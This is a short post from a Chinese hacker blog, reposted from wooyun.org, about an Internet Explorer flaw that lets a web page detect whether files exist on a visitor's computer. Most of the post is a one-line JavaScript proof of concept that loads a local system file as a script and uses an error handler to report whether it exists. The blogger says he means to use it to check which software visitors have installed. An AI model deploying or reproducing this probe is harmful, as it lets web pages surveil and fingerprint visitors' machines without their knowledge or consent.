导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

« Javascript中IFrame父窗口与子窗口相互操作总收集:mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 »

效果很好,转个微软IE本地文件探测漏洞

心动吧明生KISS注:刚刚在wooyun.org网站看到了一条这样的信息,感觉十分有用.所以先保存下来先.因为最近在做市场调查.感觉这样的方法可以很容易检测到一些默认的软件是否被启动了..以后找个时间测试一下

 

简要描述:

微软ie在处理对本地文件请求时存在一些问题,可以用来探测本地文件是否存在,忽忽

详细说明:

非res协议哦!

 

代码:

<script>window.onerror=function(){alert('文件存在');return true;}</script><script src="file://c:/windows/system32/cmd.exe"></script>

原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/windowsoday/316/

  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑客榜之本月排行

搜索内容

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved